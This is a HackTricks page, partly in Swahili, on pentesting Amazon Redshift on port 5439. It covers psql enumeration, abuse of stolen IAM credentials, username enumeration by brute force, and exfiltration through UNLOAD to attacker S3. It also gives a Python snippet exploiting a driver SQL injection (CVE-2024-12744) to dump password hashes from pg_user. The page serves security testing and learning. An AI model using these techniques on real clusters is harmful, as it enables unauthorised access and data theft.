5439 - Pentesting Redshift

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

This port is used by Amazon Redshift (AWS managed data warehouse). Redshift wire protocol is a slightly modified PostgreSQL protocol, so most Postgres client tooling works (psql, psycopg2, JDBC/ODBC) but auth and TLS requirements differ.

For more information check:

AWS - Redshift Enum - HackTricks Cloud

Uorodheshaji na Muunganisho

• Bandari chaguo-msingi: 5439/TCP (inaweza kubadilishwa). Serverless workgroups pia huanza kwa 5439.
• Mfano wa endpoint ya umma: <clusterid>.<random>.<region>.redshift.amazonaws.com (public) or .redshift.amazonaws.com.cn (China). Serverless: <workgroup>.<random>.<region>.redshift-serverless.amazonaws.com.
• TLS: Redshift inahitaji TLS 1.2+ na cipher za perfect-forward-secrecy. Wateja wa zamani wanaweza kushindwa; lazimisha TLS ya kisasa:

psql "host=<endpoint> port=5439 user=awsuser dbname=dev sslmode=require"
# or using redshift-psql wrapper

• Parameter group require_ssl inadhibiti kama plaintext inaruhusiwa. Clusters/workgroups mpya zinatumia default.redshift-2.0 zenye require_ssl=true, hivyo downgrade/mitm ni ngumu zaidi.

Uorodheshaji wa haraka na psql

# basic banner/version
psql "host=<endpoint> user=<u> dbname=dev" -c 'select version();'
# list dbs, users, privileges
\l
\du
select * from pg_user;
select * from svv_redshift_sessions;

Errors differentiate bad password vs missing user → potential username enumeration during brute force.

Authentication paths to test

• Database password for master user (often named awsuser) or created DB users.
• IAM auth tokens: generate short-lived credentials and connect via libpq/JDBC/ODBC using sslmode=require and authMech=IAM or plugin_name=com.amazon.redshift.plugin.OktaCredentialsProvider. Abuse stolen IAM creds/roles with rds-db:connect style permission equivalent for Redshift.

aws redshift get-cluster-credentials --cluster-identifier <id> \
--db-user pentest --db-name dev --duration-seconds 900
psql "host=<endpoint> user=pentest password=<token> dbname=dev sslmode=require"

• IAM Identity Center / SAML / Azure AD plugins: JDBC plugin_name may spin up local webserver for SSO; captured loopback callback can leak SAML assertion or temp creds.

Common misconfigurations (network)

• Cluster marked PubliclyAccessible=true with wide-open SG (0.0.0.0/0) exposes Postgres-like surface for brute force or SQLi exploitation.
• Default port 5439 plus default SG allows easy discovery (Shodan/Censys). Changing port is minor obscurity but sometimes overlooked in hardening checklists.
• No enhanced VPC routing → COPY/UNLOAD go over public Internet; can be abused for exfil when attacker controls S3 bucket/endpoint.

Attack notes

• If login succeeds, Redshift lacks superuser in serverless; in provisioned clusters the master user has broad rights including creating UDFs (Python), external schema to Spectrum, COPY from attacker S3, and UNLOAD to exfil data.
• Check cluster parameter group for max_concurrency_scaling_clusters, require_ssl, enable_user_activity_logging – logging disabled aids stealth.
• Serverless workgroups still reachable via TCP; same SQL attack surface as provisioned clusters.
• Client-side metadata SQLi (Dec 2024): JDBC 2.1.0.31, Python connector 2.1.4 and ODBC 2.1.5.0 build metadata queries with unquoted user input in getSchemas/getTables/getColumns (CVE-2024-12744/5/6). If an app lets attackers control catalog or pattern arguments, you can inject arbitrary SQL that runs with the DB user used by the connector.

# exploit vulnerable python connector 2.1.4 via metadata API
import redshift_connector
conn = redshift_connector.connect(host='<endpoint>', database='dev', user='lowpriv', password='pw')
cur = conn.cursor()
# injection in table_pattern leaks data from pg_tables
cur.get_tables(table_schema='public', table_name_pattern="%' UNION SELECT usename,passwd FROM pg_user--")

• UDF execution model change: Python UDFs stop working June 30, 2026; only Lambda UDFs allowed after. Offensive impact: legacy provisioned clusters still run Python UDFs for in-cluster code exec (no FS/network). Lambda UDFs move code to Lambda where the IAM role may reach Internet/VPC endpoints for SSRF/pivot but with no direct cluster filesystem access. Hunting old clusters with Python UDFs enabled can still yield RCE primitives.

Recent security changes (offense impact)

• Public access disabled by default on new clusters/snapshots (Jan 10, 2025 change). Legacy ones may still be public.
• Encryption at rest + enforced TLS by default means sniffing/mitm harder; need valid credentials or SSRF into VPC path.
• Serverless VPCE rollout change (Jun 27, 2025): workgroup endpoints created in up to 3 AZs at creation time. Discovery tools should enumerate all workgroup VPCE DNS names per AZ to find reachable IPs.

References

• AWS Security Bulletin – SQLi in Redshift JDBC/Python/ODBC drivers (CVE-2024-12744/5/6)
• AWS Big Data Blog – Python UDF end-of-support and migration to Lambda UDFs (Jan 2026)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.